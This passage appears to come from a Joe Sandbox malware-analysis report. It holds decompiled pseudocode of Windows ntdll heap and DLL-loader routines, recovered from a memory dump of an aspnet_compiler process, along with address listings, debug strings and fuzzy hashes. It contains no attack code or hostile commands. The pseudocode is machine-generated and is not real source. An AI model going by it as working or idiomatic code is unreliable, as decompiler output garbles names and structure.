                          				_t82 = E01417D50();
                          				_t125 = 0x7ffe038a;
                          				if(_t82 != 0) {
                          					_t85 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                          				} else {
                          					_t85 = 0x7ffe038a;
                          				}
                          				if( *_t85 != 0) {
                          					__eflags = E01417D50();
                          					if(__eflags != 0) {
                          						_t125 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                          						__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                          					}
                          					E014B1582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t125 & 0x000000ff);
                          				}
                          				 *((intOrPtr*)(_t129 + 0x20c)) =  *((intOrPtr*)(_t129 + 0x20c)) + 1;
                          				_t91 =  *(_t103 + 2);
                          				if((_t91 & 0x00000004) != 0) {
                          					E0144D5E0( *((intOrPtr*)(_t133 + 0x18)),  *((intOrPtr*)(_t133 + 0x10)), 0xfeeefeee);
                          					_t91 =  *(_t103 + 2);
                          				}
                          				 *(_t103 + 2) = _t91 & 0x00000017;
                          				_t65 = 1;
                          				goto L13;
                          			}






























                          0x0141a229
                          0x0141a231
                          0x0141a23f
                          0x0141a242
                          0x0141a244
                          0x0141a24c
                          0x0141a255
                          0x0141a25a
                          0x0141a25f
                          0x01461c76
                          0x01461c78
                          0x01461c7e
                          0x01461c7f
                          0x01461c81
                          0x01461c82
                          0x01461c84
                          0x01461c89
                          0x01461c8b
                          0x01461c9e
                          0x01461c9e
                          0x01461cab
                          0x01461cb2
                          0x00000000
                          0x01461cb2
                          0x01461c8d
                          0x01461c92
                          0x00000000
                          0x00000000
                          0x01461c94
                          0x01461c98
                          0x00000000
                          0x00000000
                          0x00000000
                          0x01461c98
                          0x0141a265
                          0x0141a265
                          0x0141a266
                          0x0141a26f
                          0x0141a270
                          0x0141a276
                          0x0141a277
                          0x0141a279
                          0x0141a27e
                          0x0141a282
                          0x01461db5
                          0x01461dbb
                          0x01461dc1
                          0x01461dc5
                          0x01461de4
                          0x01461de9
                          0x01461dc7
                          0x01461ddc
                          0x01461de1
                          0x01461def
                          0x01461df3
                          0x01461df7
                          0x01461dfe
                          0x01461e06
                          0x0141a302
                          0x0141a308
                          0x0141a308
                          0x0141a288
                          0x0141a28d
                          0x0141a294
                          0x01461cc1
                          0x0141a29a
                          0x0141a29a
                          0x0141a29a
                          0x0141a29f
                          0x01461ccb
                          0x01461cd1
                          0x01461cd8
                          0x01461cea
                          0x01461cea
                          0x01461cd8
                          0x0141a2a9
                          0x0141a2af
                          0x0141a2bc
                          0x01461cfd
                          0x0141a2c2
                          0x0141a2c2
                          0x0141a2c2
                          0x0141a2c7
                          0x01461d07
                          0x01461d0d
                          0x01461d14
                          0x01461d1f
                          0x01461d21
                          0x01461d2c
                          0x01461d2c
                          0x01461d2c
                          0x01461d47
                          0x01461d47
                          0x01461d14
                          0x0141a2cd
                          0x0141a2d2
                          0x0141a2d9
                          0x01461d5a
                          0x0141a2df
                          0x0141a2df
                          0x0141a2df
                          0x0141a2e4
                          0x01461d69
                          0x01461d6b
                          0x01461d76
                          0x01461d76
                          0x01461d76
                          0x01461d91
                          0x01461d91
                          0x0141a2ea
                          0x0141a2f0
                          0x0141a2f5
                          0x01461da8
                          0x01461dad
                          0x01461dad
                          0x0141a2fd
                          0x0141a300
                          0x00000000

                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                          • API String ID: 2994545307-2586055223
                          • Opcode ID: f77cb6327035ffdf971baacba24461115cfbe9c50a058fc651a226592b6d7ef0
                          • Instruction ID: 3650983230e59983f6c21864d5ef9d40eb9d920e5c97b8adb9ffe734ad842541
                          • Opcode Fuzzy Hash: f77cb6327035ffdf971baacba24461115cfbe9c50a058fc651a226592b6d7ef0
                          • Instruction Fuzzy Hash: E75126722056819FE322DB69C844FA77BE8FF90B14F18046AF5558B3B5D734E801CB62
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 44%
                          			E01428E00(void* __ecx) {
                          				signed int _v8;
                          				char _v12;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				intOrPtr* _t32;
                          				intOrPtr _t35;
                          				intOrPtr _t43;
                          				void* _t46;
                          				intOrPtr _t47;
                          				void* _t48;
                          				signed int _t49;
                          				void* _t50;
                          				intOrPtr* _t51;
                          				signed int _t52;
                          				void* _t53;
                          				intOrPtr _t55;
                          
                          				_v8 =  *0x14ed360 ^ _t52;
                          				_t49 = 0;
                          				_t48 = __ecx;
                          				_t55 =  *0x14e8464; // 0x74e10110
                          				if(_t55 == 0) {
                          					L9:
                          					if( !_t49 >= 0) {
                          						if(( *0x14e5780 & 0x00000003) != 0) {
                          							E01475510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
                          						}
                          						if(( *0x14e5780 & 0x00000010) != 0) {
                          							asm("int3");
                          						}
                          					}
                          					return E0143B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
                          				}
                          				_t47 =  *((intOrPtr*)(__ecx + 0x18));
                          				_t43 =  *0x14e7984; // 0xfa2b58
                          				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
                          					_t32 =  *((intOrPtr*)(_t48 + 0x28));
                          					if(_t48 == _t43) {
                          						_t50 = 0x5c;
                          						if( *_t32 == _t50) {
                          							_t46 = 0x3f;
                          							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
                          								_t32 = _t32 + 8;
                          							}
                          						}
                          					}
                          					_t51 =  *0x14e8464; // 0x74e10110
                          					 *0x14eb1e0(_t47, _t32,  &_v12);
                          					_t49 =  *_t51();
                          					if(_t49 >= 0) {
                          						L8:
                          						_t35 = _v12;
                          						if(_t35 != 0) {
                          							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
                          								E01429B10( *((intOrPtr*)(_t48 + 0x48)));
                          								_t35 = _v12;
                          							}
                          							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
                          						}
                          						goto L9;
                          					}
                          					if(_t49 != 0xc000008a) {
                          						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
                          							if(_t49 != 0xc00000bb) {
                          								goto L8;
                          							}
                          						}
                          					}
                          					if(( *0x14e5780 & 0x00000005) != 0) {
                          						_push(_t49);
                          						E01475510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
                          						_t53 = _t53 + 0x1c;
                          					}
                          					_t49 = 0;
                          					goto L8;
                          				} else {
                          					goto L9;
                          				}
                          			}




















                          0x01428e0f
                          0x01428e16
                          0x01428e19
                          0x01428e1b
                          0x01428e21
                          0x01428e7f
                          0x01428e85
                          0x01469354
                          0x0146936c
                          0x01469371
                          0x0146937b
                          0x01469381
                          0x01469381
                          0x0146937b
                          0x01428e9d
                          0x01428e9d
                          0x01428e29
                          0x01428e2c
                          0x01428e38
                          0x01428e3e
                          0x01428e43
                          0x01428eb5
                          0x01428eb9
                          0x014692aa
                          0x014692af
                          0x014692e8
                          0x014692e8
                          0x014692af
                          0x01428eb9
                          0x01428e45
                          0x01428e53
                          0x01428e5b
                          0x01428e5f
                          0x01428e78
                          0x01428e78
                          0x01428e7d
                          0x01428ec3
                          0x01428ecd
                          0x01428ed2
                          0x01428ed2
                          0x01428ec5
                          0x01428ec5
                          0x00000000
                          0x01428e7d
                          0x01428e67
                          0x01428ea4
                          0x0146931a
                          0x00000000
                          0x00000000
                          0x01469320
                          0x01428ea4
                          0x01428e70
                          0x01469325
                          0x01469340
                          0x01469345
                          0x01469345
                          0x01428e76
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000

                          Strings
                          • minkernel\ntdll\ldrsnap.c, xrefs: 0146933B, 01469367
                          • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0146932A
                          • Querying the active activation context failed with status 0x%08lx, xrefs: 01469357
                          • LdrpFindDllActivationContext, xrefs: 01469331, 0146935D
                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                          • API String ID: 0-3779518884
                          • Opcode ID: d0335eb7cddfccf6982c001432de1ce5be4daae5ea18bf5cd436c949ba8c1d8d
                          • Instruction ID: 0a98927df121c98bf9c6537b867e4a008991afb8767596967f7f59c34c15c93b
                          • Opcode Fuzzy Hash: d0335eb7cddfccf6982c001432de1ce5be4daae5ea18bf5cd436c949ba8c1d8d
                          • Instruction Fuzzy Hash: 5E411932A003379EEB35AB1CC849A3FBAE5AB14269F85456BD504DB372E7709CC08381
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                          • API String ID: 2994545307-336120773
                          • Opcode ID: c3d47dd94dad8c88c93ff9fd26f199fa8b466294c8115c8a9ad239181c5c679f
                          • Instruction ID: 2dd2b14d8ef13319d9433a3c99b751c3a5254fdba41fb793a1f8c6ae2b3c24a4
                          • Opcode Fuzzy Hash: c3d47dd94dad8c88c93ff9fd26f199fa8b466294c8115c8a9ad239181c5c679f
                          • Instruction Fuzzy Hash: DE311672200110EFDB20DB9DD8C5FA7B7E8EF08624F18445AF5069B3A2D770A940CB79
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 78%
                          			E014199BF(signed int __ecx, signed short* __edx, signed int* _a4, signed int _a8) {
                          				char _v5;
                          				signed int _v12;
                          				signed int _v16;
                          				signed short _v20;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				void* __ebp;
                          				signed short _t186;
                          				intOrPtr _t187;
                          				signed short _t190;
                          				signed int _t196;
                          				signed short _t197;
                          				intOrPtr _t203;
                          				signed int _t207;
                          				signed int _t210;
                          				signed short _t215;
                          				intOrPtr _t216;
                          				signed short _t219;
                          				signed int _t221;
                          				signed short _t222;
                          				intOrPtr _t228;
                          				signed int _t232;
                          				signed int _t235;
                          				signed int _t250;
                          				signed short _t251;
                          				intOrPtr _t252;
                          				signed short _t254;
                          				intOrPtr _t255;
                          				signed int _t258;
                          				signed int _t259;
                          				signed short _t262;
                          				intOrPtr _t271;
                          				signed int _t279;
                          				signed int _t282;
                          				signed int _t284;
                          				signed int _t286;
                          				intOrPtr _t292;
                          				signed int _t296;
                          				signed int _t299;
                          				signed int _t307;
                          				signed int* _t309;
                          				signed short* _t311;
                          				signed short* _t313;
                          				signed char _t314;
                          				intOrPtr _t316;
                          				signed int _t323;
                          				signed char _t328;
                          				signed short* _t330;
                          				signed char _t331;
                          				intOrPtr _t335;
                          				signed int _t342;
                          				signed char _t347;
                          				signed short* _t348;
                          				signed short* _t350;
                          				signed short _t352;
                          				signed char _t354;
                          				intOrPtr _t357;
                          				intOrPtr* _t364;
                          				signed char _t365;
                          				intOrPtr _t366;
                          				signed int _t373;
                          				signed char _t378;
                          				signed int* _t381;
                          				signed int _t382;
                          				signed short _t384;
                          				signed int _t386;
                          				unsigned int _t390;
                          				signed int _t393;
                          				signed int* _t394;
                          				unsigned int _t398;
                          				signed short _t400;
                          				signed short _t402;
                          				signed int _t404;
                          				signed int _t407;
                          				unsigned int _t411;
                          				signed short* _t414;
                          				signed int _t415;
                          				signed short* _t419;
                          				signed int* _t420;
                          				void* _t421;
                          
                          				_t414 = __edx;
                          				_t307 = __ecx;
                          				_t419 = __edx - (( *(__edx + 4) & 0x0000ffff ^  *(__ecx + 0x54) & 0x0000ffff) << 3);
                          				if(_t419 == __edx || (( *(__ecx + 0x4c) >> 0x00000014 &  *(__ecx + 0x52) ^ _t419[1]) & 0x00000001) != 0) {
                          					_v5 = _a8;
                          					L3:
                          					_t381 = _a4;
                          					goto L4;
                          				} else {
                          					__eflags =  *(__ecx + 0x4c);
                          					if( *(__ecx + 0x4c) != 0) {
                          						_t411 =  *(__ecx + 0x50) ^  *_t419;
                          						 *_t419 = _t411;
                          						_t378 = _t411 >> 0x00000010 ^ _t411 >> 0x00000008 ^ _t411;
                          						__eflags = _t411 >> 0x18 - _t378;
                          						if(__eflags != 0) {
                          							_push(_t378);
                          							E014AFA2B(__ecx, __ecx, _t419, __edx, _t419, __eflags);
                          						}
                          					}
                          					_t250 = _a8;
                          					_v5 = _t250;
                          					__eflags = _t250;
                          					if(_t250 != 0) {
                          						_t400 = _t414[6];
                          						_t53 =  &(_t414[4]); // -16
                          						_t348 = _t53;
                          						_t251 =  *_t348;
                          						_v12 = _t251;
                          						_v16 = _t400;
                          						_t252 =  *((intOrPtr*)(_t251 + 4));
                          						__eflags =  *_t400 - _t252;
                          						if( *_t400 != _t252) {
                          							L49:
                          							_push(_t348);
                          							_push( *_t400);
                          							E014BA80D(_t307, 0xd, _t348, _t252);
                          							L50:
                          							_v5 = 0;
                          							goto L11;
                          						}
                          						__eflags =  *_t400 - _t348;
                          						if( *_t400 != _t348) {
                          							goto L49;
                          						}
                          						 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
                          						_t407 =  *(_t307 + 0xb4);
                          						__eflags = _t407;
                          						if(_t407 == 0) {
                          							L36:
                          							_t364 = _v16;
                          							_t282 = _v12;
                          							 *_t364 = _t282;
                          							 *((intOrPtr*)(_t282 + 4)) = _t364;
                          							__eflags = _t414[1] & 0x00000008;
                          							if((_t414[1] & 0x00000008) == 0) {
                          								L39:
                          								_t365 = _t414[1];
                          								__eflags = _t365 & 0x00000004;
                          								if((_t365 & 0x00000004) != 0) {
                          									_t284 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
                          									_v12 = _t284;
                          									__eflags = _t365 & 0x00000002;
                          									if((_t365 & 0x00000002) != 0) {
                          										__eflags = _t284 - 4;
                          										if(_t284 > 4) {
                          											_t284 = _t284 - 4;
                          											__eflags = _t284;
                          											_v12 = _t284;
                          										}
                          									}
                          									_t78 =  &(_t414[8]); // -8
                          									_t286 = E0144D540(_t78, _t284, 0xfeeefeee);
                          									_v16 = _t286;
                          									__eflags = _t286 - _v12;
                          									if(_t286 != _v12) {
                          										_t366 =  *[fs:0x30];
                          										__eflags =  *(_t366 + 0xc);
                          										if( *(_t366 + 0xc) == 0) {
                          											_push("HEAP: ");
                          											E013FB150();
                          										} else {
                          											E013FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                          										}
                          										_push(_v16 + 0x10 + _t414);
                          										E013FB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
                          										_t292 =  *[fs:0x30];
                          										_t421 = _t421 + 0xc;
                          										__eflags =  *((char*)(_t292 + 2));
                          										if( *((char*)(_t292 + 2)) != 0) {
                          											 *0x14e6378 = 1;
                          											asm("int3");
                          											 *0x14e6378 = 0;
                          										}
                          									}
                          								}
                          								goto L50;
                          							}
                          							_t296 = E0141A229(_t307, _t414);
                          							__eflags = _t296;
                          							if(_t296 != 0) {
                          								goto L39;
                          							} else {
                          								E0141A309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
                          								goto L50;
                          							}
                          						} else {
                          							_t373 =  *_t414 & 0x0000ffff;
                          							while(1) {
                          								__eflags = _t373 -  *((intOrPtr*)(_t407 + 4));
                          								if(_t373 <  *((intOrPtr*)(_t407 + 4))) {
                          									_t301 = _t373;
                          									break;
                          								}
                          								_t299 =  *_t407;
                          								__eflags = _t299;
                          								if(_t299 == 0) {
                          									_t301 =  *((intOrPtr*)(_t407 + 4)) - 1;
                          									__eflags =  *((intOrPtr*)(_t407 + 4)) - 1;
                          									break;
                          								} else {
                          									_t407 = _t299;
                          									continue;
                          								}
                          							}
                          							_t62 =  &(_t414[4]); // -16
                          							E0141BC04(_t307, _t407, 1, _t62, _t301, _t373);
                          							goto L36;
                          						}
                          					}
                          					L11:
                          					_t402 = _t419[6];
                          					_t25 =  &(_t419[4]); // -16
                          					_t350 = _t25;
                          					_t254 =  *_t350;
                          					_v12 = _t254;
                          					_v20 = _t402;
                          					_t255 =  *((intOrPtr*)(_t254 + 4));
                          					__eflags =  *_t402 - _t255;
                          					if( *_t402 != _t255) {
                          						L61:
                          						_push(_t350);
                          						_push( *_t402);
                          						E014BA80D(_t307, 0xd, _t350, _t255);
                          						goto L3;
                          					}
                          					__eflags =  *_t402 - _t350;
                          					if( *_t402 != _t350) {
                          						goto L61;
                          					}
                          					 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t419 & 0x0000ffff);
                          					_t404 =  *(_t307 + 0xb4);
                          					__eflags = _t404;
                          					if(_t404 == 0) {
                          						L20:
                          						_t352 = _v20;
                          						_t258 = _v12;
                          						 *_t352 = _t258;
                          						 *(_t258 + 4) = _t352;
                          						__eflags = _t419[1] & 0x00000008;
                          						if((_t419[1] & 0x00000008) != 0) {
                          							_t259 = E0141A229(_t307, _t419);
                          							__eflags = _t259;
                          							if(_t259 != 0) {
                          								goto L21;
                          							} else {
                          								E0141A309(_t307, _t419,  *_t419 & 0x0000ffff, 1);
                          								goto L3;
                          							}
                          						}
                          						L21:
                          						_t354 = _t419[1];
                          						__eflags = _t354 & 0x00000004;
                          						if((_t354 & 0x00000004) != 0) {
                          							_t415 = ( *_t419 & 0x0000ffff) * 8 - 0x10;
                          							__eflags = _t354 & 0x00000002;
                          							if((_t354 & 0x00000002) != 0) {
                          								__eflags = _t415 - 4;
                          								if(_t415 > 4) {
                          									_t415 = _t415 - 4;
                          									__eflags = _t415;
                          								}
                          							}
                          							_t91 =  &(_t419[8]); // -8
                          							_t262 = E0144D540(_t91, _t415, 0xfeeefeee);
                          							_v20 = _t262;
                          							__eflags = _t262 - _t415;
                          							if(_t262 != _t415) {
                          								_t357 =  *[fs:0x30];
                          								__eflags =  *(_t357 + 0xc);
                          								if( *(_t357 + 0xc) == 0) {
                          									_push("HEAP: ");
                          									E013FB150();
                          								} else {
                          									E013FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                          								}
                          								_push(_v20 + 0x10 + _t419);
                          								E013FB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t419);
                          								_t271 =  *[fs:0x30];
                          								_t421 = _t421 + 0xc;
                          								__eflags =  *((char*)(_t271 + 2));
                          								if( *((char*)(_t271 + 2)) != 0) {
                          									 *0x14e6378 = 1;
                          									asm("int3");
                          									 *0x14e6378 = 0;
                          								}
                          							}
                          						}
                          						_t381 = _a4;
                          						_t414 = _t419;
                          						_t419[1] = 0;
                          						_t419[3] = 0;
                          						 *_t381 =  *_t381 + ( *_t419 & 0x0000ffff);
                          						 *_t419 =  *_t381;
                          						 *(_t419 + 4 +  *_t381 * 8) =  *_t381 ^  *(_t307 + 0x54);
                          						L4:
                          						_t420 = _t414 +  *_t381 * 8;
                          						if( *(_t307 + 0x4c) == 0) {
                          							L6:
                          							while((( *(_t307 + 0x4c) >> 0x00000014 &  *(_t307 + 0x52) ^ _t420[0]) & 0x00000001) == 0) {
                          								__eflags =  *(_t307 + 0x4c);
                          								if( *(_t307 + 0x4c) != 0) {
                          									_t390 =  *(_t307 + 0x50) ^  *_t420;
                          									 *_t420 = _t390;
                          									_t328 = _t390 >> 0x00000010 ^ _t390 >> 0x00000008 ^ _t390;
                          									__eflags = _t390 >> 0x18 - _t328;
                          									if(__eflags != 0) {
                          										_push(_t328);
                          										E014AFA2B(_t307, _t307, _t420, _t414, _t420, __eflags);
                          									}
                          								}
                          								__eflags = _v5;
                          								if(_v5 == 0) {
                          									L94:
                          									_t382 = _t420[3];
                          									_t137 =  &(_t420[2]); // -16
                          									_t309 = _t137;
                          									_t186 =  *_t309;
                          									_v20 = _t186;
                          									_v16 = _t382;
                          									_t187 =  *((intOrPtr*)(_t186 + 4));
                          									__eflags =  *_t382 - _t187;
                          									if( *_t382 != _t187) {
                          										L63:
                          										_push(_t309);
                          										_push( *_t382);
                          										_push(_t187);
                          										_push(_t309);
                          										_push(0xd);
                          										L64:
                          										E014BA80D(_t307);
                          										continue;
                          									}
                          									__eflags =  *_t382 - _t309;
                          									if( *_t382 != _t309) {
                          										goto L63;
                          									}
                          									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t420 & 0x0000ffff);
                          									_t393 =  *(_t307 + 0xb4);
                          									__eflags = _t393;
                          									if(_t393 == 0) {
                          										L104:
                          										_t330 = _v16;
                          										_t190 = _v20;
                          										 *_t330 = _t190;
                          										 *(_t190 + 4) = _t330;
                          										__eflags = _t420[0] & 0x00000008;
                          										if((_t420[0] & 0x00000008) == 0) {
                          											L107:
                          											_t331 = _t420[0];
                          											__eflags = _t331 & 0x00000004;
                          											if((_t331 & 0x00000004) != 0) {
                          												_t196 = ( *_t420 & 0x0000ffff) * 8 - 0x10;
                          												_v12 = _t196;
                          												__eflags = _t331 & 0x00000002;
                          												if((_t331 & 0x00000002) != 0) {
                          													__eflags = _t196 - 4;
                          													if(_t196 > 4) {
                          														_t196 = _t196 - 4;
                          														__eflags = _t196;
                          														_v12 = _t196;
                          													}
                          												}
                          												_t162 =  &(_t420[4]); // -8
                          												_t197 = E0144D540(_t162, _t196, 0xfeeefeee);
                          												_v20 = _t197;
                          												__eflags = _t197 - _v12;
                          												if(_t197 != _v12) {
                          													_t335 =  *[fs:0x30];
                          													__eflags =  *(_t335 + 0xc);
                          													if( *(_t335 + 0xc) == 0) {
                          														_push("HEAP: ");
                          														E013FB150();
                          													} else {
                          														E013FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                          													}
                          													_push(_v20 + 0x10 + _t420);
                          													E013FB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t420);
                          													_t203 =  *[fs:0x30];
                          													__eflags =  *((char*)(_t203 + 2));
                          													if( *((char*)(_t203 + 2)) != 0) {
                          														 *0x14e6378 = 1;
                          														asm("int3");
                          														 *0x14e6378 = 0;
                          													}
                          												}
                          											}
                          											_t394 = _a4;
                          											_t414[1] = 0;
                          											_t414[3] = 0;
                          											 *_t394 =  *_t394 + ( *_t420 & 0x0000ffff);
                          											 *_t414 =  *_t394;
                          											 *(_t414 + 4 +  *_t394 * 8) =  *_t394 ^  *(_t307 + 0x54);
                          											break;
                          										}
                          										_t207 = E0141A229(_t307, _t420);
                          										__eflags = _t207;
                          										if(_t207 != 0) {
                          											goto L107;
                          										}
                          										E0141A309(_t307, _t420,  *_t420 & 0x0000ffff, 1);
                          										continue;
                          									}
                          									_t342 =  *_t420 & 0x0000ffff;
                          									while(1) {
                          										__eflags = _t342 -  *((intOrPtr*)(_t393 + 4));
                          										if(_t342 <  *((intOrPtr*)(_t393 + 4))) {
                          											break;
                          										}
                          										_t210 =  *_t393;
                          										__eflags = _t210;
                          										if(_t210 == 0) {
                          											_t212 =  *((intOrPtr*)(_t393 + 4)) - 1;
                          											__eflags =  *((intOrPtr*)(_t393 + 4)) - 1;
                          											L103:
                          											_t146 =  &(_t420[2]); // -16
                          											E0141BC04(_t307, _t393, 1, _t146, _t212, _t342);
                          											goto L104;
                          										}
                          										_t393 = _t210;
                          									}
                          									_t212 = _t342;
                          									goto L103;
                          								} else {
                          									_t384 = _t414[6];
                          									_t102 =  &(_t414[4]); // -16
                          									_t311 = _t102;
                          									_t215 =  *_t311;
                          									_v20 = _t215;
                          									_v16 = _t384;
                          									_t216 =  *((intOrPtr*)(_t215 + 4));
                          									__eflags =  *_t384 - _t216;
                          									if( *_t384 != _t216) {
                          										L92:
                          										_push(_t311);
                          										_push( *_t384);
                          										E014BA80D(_t307, 0xd, _t311, _t216);
                          										L93:
                          										_v5 = 0;
                          										goto L94;
                          									}
                          									__eflags =  *_t384 - _t311;
                          									if( *_t384 != _t311) {
                          										goto L92;
                          									}
                          									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
                          									_t386 =  *(_t307 + 0xb4);
                          									__eflags = _t386;
                          									if(_t386 == 0) {
                          										L79:
                          										_t313 = _v16;
                          										_t219 = _v20;
                          										 *_t313 = _t219;
                          										 *(_t219 + 4) = _t313;
                          										__eflags = _t414[1] & 0x00000008;
                          										if((_t414[1] & 0x00000008) == 0) {
                          											L82:
                          											_t314 = _t414[1];
                          											__eflags = _t314 & 0x00000004;
                          											if((_t314 & 0x00000004) != 0) {
                          												_t221 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
                          												_v12 = _t221;
                          												__eflags = _t314 & 0x00000002;
                          												if((_t314 & 0x00000002) != 0) {
                          													__eflags = _t221 - 4;
                          													if(_t221 > 4) {
                          														_t221 = _t221 - 4;
                          														__eflags = _t221;
                          														_v12 = _t221;
                          													}
                          												}
                          												_t127 =  &(_t414[8]); // -8
                          												_t222 = E0144D540(_t127, _t221, 0xfeeefeee);
                          												_v20 = _t222;
                          												__eflags = _t222 - _v12;
                          												if(_t222 != _v12) {
                          													_t316 =  *[fs:0x30];
                          													__eflags =  *(_t316 + 0xc);
                          													if( *(_t316 + 0xc) == 0) {
                          														_push("HEAP: ");
                          														E013FB150();
                          													} else {
                          														E013FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                          													}
                          													_push(_v20 + 0x10 + _t414);
                          													E013FB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
                          													_t228 =  *[fs:0x30];
                          													_t421 = _t421 + 0xc;
                          													__eflags =  *((char*)(_t228 + 2));
                          													if( *((char*)(_t228 + 2)) != 0) {
                          														 *0x14e6378 = 1;
                          														asm("int3");
                          														 *0x14e6378 = 0;
                          													}
                          												}
                          											}
                          											goto L93;
                          										}
                          										_t232 = E0141A229(_t307, _t414);
                          										__eflags = _t232;
                          										if(_t232 != 0) {
                          											goto L82;
                          										}
                          										E0141A309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
                          										goto L93;
                          									}
                          									_t323 =  *_t414 & 0x0000ffff;
                          									while(1) {
                          										__eflags = _t323 -  *((intOrPtr*)(_t386 + 4));
                          										if(_t323 <  *((intOrPtr*)(_t386 + 4))) {
                          											break;
                          										}
                          										_t235 =  *_t386;
                          										__eflags = _t235;
                          										if(_t235 == 0) {
                          											_t237 =  *((intOrPtr*)(_t386 + 4)) - 1;
                          											__eflags =  *((intOrPtr*)(_t386 + 4)) - 1;
                          											L78:
                          											_t111 =  &(_t414[4]); // -16
                          											E0141BC04(_t307, _t386, 1, _t111, _t237, _t323);
                          											goto L79;
                          										}
                          										_t386 = _t235;
                          									}
                          									_t237 = _t323;
                          									goto L78;
                          								}
                          							}
                          							return _t414;
                          						}
                          						_t398 =  *(_t307 + 0x50) ^  *_t420;
                          						_t347 = _t398 >> 0x00000010 ^ _t398 >> 0x00000008 ^ _t398;
                          						if(_t398 >> 0x18 != _t347) {
                          							_push(_t347);
                          							_push(0);
                          							_push(0);
                          							_push(_t420);
                          							_push(3);
                          							goto L64;
                          						}
                          						goto L6;
                          					} else {
                          						_t277 =  *_t419 & 0x0000ffff;
                          						_v16 = _t277;
                          						while(1) {
                          							__eflags = _t277 -  *((intOrPtr*)(_t404 + 4));
                          							if(_t277 <  *((intOrPtr*)(_t404 + 4))) {
                          								break;
                          							}
                          							_t279 =  *_t404;
                          							__eflags = _t279;
                          							if(_t279 == 0) {
                          								_t277 =  *((intOrPtr*)(_t404 + 4)) - 1;
                          								__eflags =  *((intOrPtr*)(_t404 + 4)) - 1;
                          								break;
                          							} else {
                          								_t404 = _t279;
                          								_t277 =  *_t419 & 0x0000ffff;
                          								continue;
                          							}
                          						}
                          						E0141BC04(_t307, _t404, 1, _t350, _t277, _v16);
                          						goto L20;
                          					}
                          				}
                          			}




















































































                          0x014199ca
                          0x014199cc
                          0x014199df
                          0x014199e3
                          0x014199f8
                          0x014199fb
                          0x014199fb
                          0x00000000
                          0x01419a48
                          0x01419a48
                          0x01419a4c
                          0x01419a51
                          0x01419a55
